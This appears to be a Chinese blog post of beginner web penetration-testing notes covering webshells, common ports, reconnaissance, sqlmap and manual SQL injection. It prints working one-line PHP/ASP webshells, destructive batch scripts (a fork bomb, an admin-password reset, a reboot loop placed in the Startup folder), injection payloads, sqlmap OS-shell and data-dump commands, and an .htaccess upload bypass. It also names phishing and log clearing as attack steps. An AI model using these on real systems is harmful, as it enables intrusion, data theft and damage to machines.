Web学习

1、 入门基础篇

肉鸡

一句话木马（配合菜刀）

              ·PHP：<?php@eval($_POST[‘chabug’]);?>

              ·ASP：<%eval request(“chabug”)%>

·ASP.NET：<%@Page Language=”Jscript”%><%eval(Request.Item[“chabug”],”unsafe”);%>

·Customize:自定义类型，功能代码在服务端保存，理论上支持所有动态脚本。只要正确与菜刀进行交互即可

菜刀

文件管理

虚拟终端

数据库管理

网站蜘蛛

定时提醒

快速启动

浏览器

Webshell脚本木马

后门

弱口令

弱口令(weak password) 没有严格和准确的定义，通常认为容易被别人（他们有可能对你很了解）猜测到或被破解工具破解的口令均为弱口令

免杀

              基本上都是修改病毒、木马的内容改变特征码，从而躲避了杀毒软件的查杀

靶场环境搭建

常见端口以及对应服务

21 ftp

23 telnet

80 web

80-89 可能是web

443 ssl心脏地穴以及一些web漏洞测试

445 smb

1433 mssql

1521 oracle

2082/2083 cpanel主机管理系统登录

2222 DA虚拟主机管理系统登录

3128 squid代理默认端口>漫游内网

3306 mysql

3312/3311 kangle主机管理系统登录

3389 远程桌面

5432 PostgreSQL

5900 vnc

6379 redis未授权

7001，7002 WebLogin默认弱口令，反序列

7778 kloxo主机控制面板登录

8000-9090 都是一些常见的web的端口

8080tomcat/WDCP 主机管理系统，默认弱口令

8080，8089，9090 jboss

8083 Vestacp主机管理系统

8649 ganglia

8888amh/LuMacager/ 宝塔主机默认管理系统默认端口

10000 Virtualmin/Webmin服务器虚拟主机管理系统

11211 memcache未授权访问

27017，27018 Mongodb未授权访问

28017 mongodb统计页面

常见的cmd命令已经bat

1、 echo

2、 dir

3、 d:和cd

4、 tree

5、 md创建目录rd删除目录

6、 ipconfig

7、 cls

8、 copy复制，拼接文件

9、 move移动文件

10、 ren重命名

11、 del删除文件

12、 ping

13、 type

14、 reg

15、 nslookup -d www.baidu.com

16、 find

17、 tasklist

18、 ver、winver

19、 start

20、 systeminfo

21、 logoff

22、 shutdown /s /f /t /a /r /g /l

23、 telnet 192.168.1.1

24、 arp -a

25、 at

26、          net

Cmd编写bat病毒

耗尽资源的bat病毒

start cmd

%0

锁机病毒

echo net user administrator 123456 > c:\windows\Temp\1.bat

echo shutdon /r /t 0 >> c:\windows\tmp\1.bat

无限重启病毒

echo shutdown /r /t 0 >c:\windows\temp\1.bat

copy              c:\windows\temp\1.bat “%USERPROFILE%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\”

网络基础

1、 HTTP协议

协议状态码：

200 Ok //刻划断请求成功

400 Bad Request //客户端请求有语法错误，不能被服务器所理解

401 Unauthorized //请求未经授权，这个状态码必须和WW W-Authenricate报头域一起使用

403 Forbidden //服务器收到请求，但是拒绝提供服务

404 Not Found //请求的资源不存在，输入了错误的URL

500 Internal Server Error //服务器发生了不可预期的错误

503 Server Unavailable //服务器当前不能处理客户端的请求，一 段时间后可能恢复正常

2、 内外网划分

解决公网IP不够用

HTML基础

1、 HTML简介

HTML是用来描述网页的一种语言

HTML指的是超文本标记语言

HTML不是一种编程语言，而是一种标记语言

标记语言是一套标记标签

HTML使用标记标签来描述网页

HTML文档包含了HTML标签以及文本内容

HTML文档也叫做WEB页面

2、 常用标签

https://www.w3school.com.cn/tags/index.asp

数据库基础

1、 关系型数据库概念

关系数据库，是建立在关系模型基础上的数据库，借助集合代数等数学概念和方法来处理数据库中的数据

当前主流的关系数据库有Oracle、DB2、PostgreSQL、Microsoft SQL Server、Microsoft Access、MySQL、浪潮K-DB等

SQL语言：通用，功能极强的关系数据库语言

2、 SQL server

3、 MYSQL

sqlserver和mysql大同小异，所以直接安装phpstudy

4、 基本操作

显示数据库 show database;

创建数据库 creat database test1;

删除数据库 drop database;

打开数据库 use test1;

显示当前打开的数据库 select database();

显示数据表字段 describe 表名;

当前数据库表结构 show table;

5、 数据类型

https://www.runoob.com/mysql/mysql-data-types.html

创建数据表 create table [表名] ([字段名] 字段类型[字段参数]…);

更改数据表 alter table [表名] add column [字段名] datatype

alter table [表名] add primary key ([字段名])

说明：更改表的定义把栏位设为主键

alter table [表名] drop primary ([字段名])

显示当前表字段 show columns from tablename;

6、 增删改查

添加 insert into [表名] values(‘’,’’,’’);

查询 select * from [表名] where ([条件]);

删除delete from [表名] where ([条件]);

修改update [表名] set [修改内容如name=’baidu’] where [条件];

2、 信息搜集篇

信息搜集

域名信息whois 社工、弱口令

IP，端口 nmap、msf

找后台 弱口令

子域名 旁站

Web服务器指纹 寻找相应漏洞

信息泄露 phpinfo()、物理路径

几种手段

1、 whois信息

whois信息可以获取关键注册人的信息，包括注册公司、注册邮箱、管理员邮箱、管理员联系手机等，对后期社工很有用。同时该工具还可以查询同一注册人的其他的域名，域名对应的ns记录、mx记录，自动识别国内常见的托管商（万网、新网等）

2、 子域名

1、 搜索引擎搜索百度的子域名inurl:baidu.com

2、 子域名挖掘机layer

3、 subDomainBrute

4、 https://phpinfo.me/domain

5、 穷举爆破

3、 目标真实IP

没加入CDN的网站只需要ping就能得到IP

加了CDN：二级域名法https://github.com/boy-hack/w8fuckcdn

域名历史解析：https://x.threatbook.cn

4、 旁站c段（目标站点服务器上的其他网站）

http://webscan.cc

nmap

5、 邮箱

先确定目标邮件服务器的真实位置，查看是否有错误配置，例如，没有金童very或者expm命令导致用户信息泄露，然后从whois获取域名的注册人、管理员邮箱，利用搜索引擎或者社工库查看有没有泄露的密码，尝试进行登录，最后从目标站点上搜索邮箱，例如对网站上的“联系我们”，发送钓鱼邮件

6、 cms类型（cms：内容管理系统）

识别方式

网站特有文件/templets/default/style/dedecms.css——dedecms

网站独有文件的md5

网站命名规则

返回头的关键字，网页关键字

url特征

script特征

robot.txt

网站路径特征

网站静态资源

爬取网站目录信息

云悉：http://yunsee.cn

whatweb：http://whatweb.bugscaner.com/look/

7、 敏感文件

.git .svn .DB_store源代码泄露

扫描工具： 御剑 dirbrute

8、 端口信息

nmap、masscan扫描探测

9、 服务器和中间件

获取web容器，寻找相应漏洞

服务器版本漏洞，linux或者windows

whatweb

10、 其他

waf防火墙 https://github.com/Ekultek/WhatWaf

cookie信息查看waf信息，然后寻找绕过这些waf的方法

安全狗 safedog：**

360主机卫士 360：：**

护卫神 Hsw：**

历史漏洞信息： https://bugs.shuimuga.com/

漏洞挖掘

Wen应用层

编辑器

文件包含

文件上传

文件下载

SQL注入

XSS

CSRF

越权

弱口令

逻辑漏洞

服务器

弱口令 mstsc的3389端口弱口令密码

shift后门 3389端口按5下shift

msf 

后台查找

1、 源代码 网站引用图片的是时候可能会暴露自己的后台

2、 robot.txt

一种存放在网页根目录下的ASCII编码的文本文件，他通常告诉网络搜索引擎的漫游器（网络蜘蛛），此网站中的那些内容是不应该被搜索引擎的漫游器获取的，那些是可以被漫游器获取的。因为一些系统中的URL是大小写敏感的，所以robot.txt的文件名统一为小写，robot.txt应放在网站的根目录下

3、 BurpSuite

Spider爬虫模块 主动式

Scanner扫描模块 主动式

Target模块 被动式

4、 扫描器

御剑

wwwscan

w9scan

awvs

5、 Google 如果在robot.txt内没有禁止搜索引擎收录的话，可以使用

inurl:www.baidu.com intitle:后台 管理 登录

site:www.baidu.com intext:登录

更多语法：https://zhuanlan.zhihu.com/p/22161675

6、 其他

找DEDECMS后台目录——https://xz.aliyun.com/t/2064

漏洞利用

权限提升

权限维持

隐蔽

周期查看

免杀

多种留后门位置权限

内网渗透

日志清扫

严谨

伪装隐藏

避免机警

3、 SQL注入篇

虚拟机安装

phpstudy安装及基本操作

ASP小旋风安装及基本操作

mysql+php注入靶场

access+asp靶场

SQLMAP篇

             sqlmap安装

1、下载sqlmap和python2

https://www.python.org/downloads/release/python-2716/

http://sqlmap.org

2、安装

3、验证安装

cmd下输入

puthon

sqlmap.py -h

sqlmap常规使用

1、 常规验证注入

指定url验证是否存在注入sqlmap .py -u “网页url”

2、 跑数据

获取当前mysqls中的所有数据库sqlmap .py -u “网页url” –dbs

获取当前数据库名字 –current-db

获取security下的数据表 -D “security” –tables

获取users表下的列名 -D “security” -T “users” –columns

导出数据-D “security” -T “users” -C “id,username,password” –columns –dump

3、 cookie注入

sqlmap -u “网页url” –cookie “uid=1” -–level 2

level为2或2以上时，才会尝试注入cookie参数，3或3以上时，会对user-agent和referer进行注入。

4、 post注入

1、 配合burp抓请求包，然后sqlmap.py -r 1.txt

2、 自动搜索表单尝试注入 sqlmap.py -u “网页url” –forms

sqlmap进阶使用

1、 前提要点

网站必须是root权限

需要知道网站的绝对路径

gpc为off，php主动转义的功能关闭：

gpc会把

’转为\’

“转为”

\转为\

My.ini下的secure_file_priv=””

2、 文件操作

–file-read #读取指定文件

–file-write #写入本地文件

–file-dest #要写入的文件绝对路径

有时可能会执行无反应，删除缓存 rm -rf /root/.sqlmap/即可

3、 命令执行

sqlmap -u “网页url” –-os-cmd=”ipconfig”

–os-cmd=”要执行的命令” #执行系统命令

sqlmap -u “网页url” –-os-shell

–os-shell #系统交互shell

ACCESS注入

1、 access数据库结构

.mdb后缀命名

一个文件就是一个数据库，和mysql不同

打开方式可以用office或者第三方

表名——字段名——数据内容

2、 注入的基本流程

》判断注入是否存在

1、 单引号报错

2、 逻辑型and 1=1 and 1=2

3、 变量做运算-减号

》猜解表名

》猜解字段数

》猜解字段名

》猜解内容长度

》猜解内容

3、 常见的注入查询方式

1、 联合查询法 union select

判断注入：and 1=1 and 1=2

猜有多少列：order by 22

猜表名并记录回显位union select 1,2,3,4,5,6,7,8…… from admin

猜列名：union select 1,2,username,4,5,6,7,8…… from admin

2、 逐字猜解法

判断注入：and 1=1 and 1=2

and exists(select * from admin)——猜表名

and exist(select user_name from admin)

查数据：1.确定长度2.确定asc数据(asc编码)

and (select top 1 len(user_name)from admin)=5

判断第一位（97代表“a”的ascII值）and(select top 1 asc(mid(user_name,1,1)) from admin)=97

判断第二位and(select top 1 asc (mid(user_name,1,2)) from admin)=97

MySQL注入

1、   数据库结构：数据库》库》表》列

2、 MySQL5注入流程：获取字段数-查库名-查表名-查列名-查数据

获取字段数：order by 临界值一个个试

获取库名：databse();

表名信息:information_schema.tables

列名信息: information_schema.columns

MySQL注入分类

1、 字符型

$sql=”select * from users where id=’$id’”;

$sql=”select * from users where id=((‘$id’))”;

$sql=”select * from users where id=(‘$id’)”;

$id=’”’.$id.’”’;

$sql=”select * from users where id=$id”;

$id=’(“’.$id.’”)’;

$sql=”select * from users where id=$id”;

2、 数字型

数字型和字符型的注入方式是一样的，不必纠结区别

3、 搜索型(模糊搜索)

select * from users where username like “%3” //查3结尾的数据

4、 cookie注入

$sql=”select * from users where id=”.$_cookie[‘uid’];

5、 HTTP头注入

头字段：https://zh.wikipedia.org/wiki/HTTP头字段

常见的头字段

X-Forwarded-For

是客户端通过HTTP代理或者负载均衡器连接到web 服务端获取源IP地址的一个标准

类似的有：

x-originating-IP：127.0.0.1

x-Forwarded-For：127.0.0.1

x-Remote-IP：127.0.0.1

x-Remote-Addr：127.0.0.1

Client-IP：127.0.0.1

User-agent   用来统计目标和违规协议

Referer          记录跳转信息

4、 文件上传

写个上传点——真正用来上传文件的地方

move_uploaded_file()函数

$_FILES全局数组

upload-labs-env集成环境https://github.com/c0ny1/upload-labs/releases

上传突破

.htaccess原理 //把1.jpg当成php文件来解析

<FilesMatch “1.jpg”>

SetHandler application/x-httpd-php

或者AddType application/x-httpd-php.jpg

上传漏洞类型

5、 XSS&CSRF

6、 权限提升

7、 权限维持

8、 正向反向代理

Web学习

原文：https://www.cnblogs.com/erroro/p/11757244.html